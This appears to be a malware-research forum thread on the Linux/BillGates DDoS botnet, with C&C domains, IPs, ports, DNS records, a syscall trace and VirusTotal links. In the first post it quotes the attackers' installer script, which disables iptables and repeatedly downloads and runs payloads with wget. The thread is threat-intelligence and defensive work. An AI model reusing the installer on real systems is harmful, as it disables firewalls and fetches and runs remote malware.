[unixfreaxjp]

Usual one, VT: https://www.virustotal.com/en/file/1808 ... 421148489/

With the "active" effort infection using this script installer (noted the semi-automation trail):

Code: Select all

#!/bin/bash
#00000000000
#000000000000
#0000000000
#========================================================================
iptables -F
/etc/init.d/iptables stop
chkconfig iptables off
rm -f /tmp/mmm*
while true

do
    ps aux | grep mmm | grep -v grep 
    if [ $? -eq 0 ];then
         sleep 10
    else
		ls -l /tmp/mmm
			if [ $? -eq 0 ];then
			 /tmp/mmm
			else
    cd /tmp/;wget http://IP:PORT/mmm ; chmod a+x mmm;/tmp/mmm
	fi
   fi
    ps aux | grep fk.sh | grep -v grep
    if [ $? -eq 0 ];then
         sleep 10
    else
	ls -l /tmp/fk.sh
	if [ $? -eq 0];then
	 /tmp/fk.sh
	else
cd /tmp;wget http://IP:PORT/fk.sh ; chmod a+x fk.sh;/tmp/fk.sh
        fi
   fi
done

It's a domain basis as CNC to knock-down:

Code: Select all

ma.wudikkk.com. 600 IN A 120.27.28.199
wudikkk.com. 3600 IN NS dns10.hichina.com.
wudikkk.com. 3600 IN NS dns9.hichina.com 

syscall PoC:

Code: Select all

sendto(5, "\333\373\1\0\0\1\0\0\0\0\0\0\2ma\7wudikkk\3com\0\0\1\0\1", 32, 0, 
{sa_family=AF_INET, sin_port=htons(53),sin_addr=inet_addr("202.238.95.24")}, 16);

CNC IP/port is up and live, feel free to play

Code: Select all

120.27.28.199:1991 
Located at: 120.27.28.199||37963 | 120.27.0.0/17 | CNNIC-ALIBABA-CN-NET | CN | ALIYUN.COM | ALIYUN COMPUTING CO. LTD

Sample spotted+contributed by malmouse - #MalwareMustDie!

[kekieres]

On 09-09-2015, we have located a sample.
unixfreaxjp, how do you get the C6C? Just executing in a sandbox and monitoring the traffic? O using strace? both?

[unixfreaxjp]

On 09-09-2015, we have located a sample.
unixfreaxjp, how do you get the C6C? Just executing in a sandbox and monitoring the traffic? O using strace? both?

None of the above. This is an open public forum, and I know for sure some of the crooks we hammered are watching this forum closely too, so I am truly sorry I can't answer your question more in here. Moreover I don't know you at all.

[kekieres]

On 09-09-2015, we have located a sample.
unixfreaxjp, how do you get the C6C? Just executing in a sandbox and monitoring the traffic? O using strace? both?

None of the above. This is an open public forum, and I know for sure some of the crooks we hammered are watching this forum closely too, so I am truly sorry I can't answer your question more in here. Moreover I don't know you at all.

I truly understand you.
Well, I did it my way and I can say that the sample connects with 218.90.200.250 on port tcp/250000
As far as I've seen and understood, it's just reporting to the C&C.

Just after that contact, it's constantly trying to resolve hostname fk.appledoesnt.com that at the moment does not exist.

In case someone wants the pcap just contact me.

just my last question. I suppose that people have noticed with a simple strings that within all samples there is a big list of IP address. In my sample they are all located in Asia. Anyone has a clue of what they are?

[unixfreaxjp]

BillGates ddoser with speedy infection, suspected a shellshock driven.

VT: https://www.virustotal.com/en/file/7a91 ... 421512473/
CNC is in USA:

Code: Select all

Sun Jan 18 01:45:24 JST 2015
Connection to 23.228.102.133 25001 port succeeded!
TCP MMD.Kicks.PRC.Moronz:xxxx->23.228.102.133:25001 (ESTABLISHED)
at ASN: 46573 | 23.228.102.0/24 | GLOBAL-FRAG-SERVERS | USA | ARIEL MICHAELI

#MalwareMustDie!

[Antelox]

Hi,
my article about Kippo Honeypot and BillGates Botnet statistics with another one C&C (samples 3 week old):

Inside a Kippo honeypot: how the billgates botnet spreads

Regards,

Antelox

[malwarelabs]

130 BillGates samples attached
pwd: infected

[unixfreaxjp]

Linux/BillGates was used by the ChinaZ actor as payload, together with Linux/.Iptables|x.
Report http://blog.malwaremustdie.org/2015/06/ ... es-on.html
VT: https://www.virustotal.com/en/file/067f ... /analysis/

Code: Select all

CNC Info:
Hostname: udp.f1122.org
IP: 61.160.213.18
Port: 25001

61.160.213.18| - |23650 | 61.160.213.0/24 | CHINANET-JS-AS | CN | chinatelecom.com.cn
ChinaNet Jiangsu Province Network
{
"ip": "61.160.213.18",
"hostname": "udp.f1122.org",
"city": "Nanjing",
"region": "Jiangsu",
"country": "CN",
"loc": "32.0617,118.7778",
"org": "AS23650 AS Number for CHINANET jiangsu province backbone"
}

[unixfreaxjp]

attacking router with ssh brute:


using hacked PC to attack..obviously..


the panel on that PC and weaponized with two ELF MIPS & x32 malware


CNC: 123.249.45.210:36000


VT:
https://www.virustotal.com/en/file/6c39 ... 435959461/
https://www.virustotal.com/en/file/9857 ... 435959488/

#MalwareMUSTDie!!

[unixfreaxjp]

On 09-09-2015, we have located a sample.
(snipped)
just my last question. I suppose that people have noticed with a simple strings that within all samples there is a big list of IP address. In my sample they are all located in Asia. Anyone has a clue of what they are?

Those IPs are DNS amplyfier IP list used for DNS flood attack. Linux/BillGates malware has this function.

Illustration: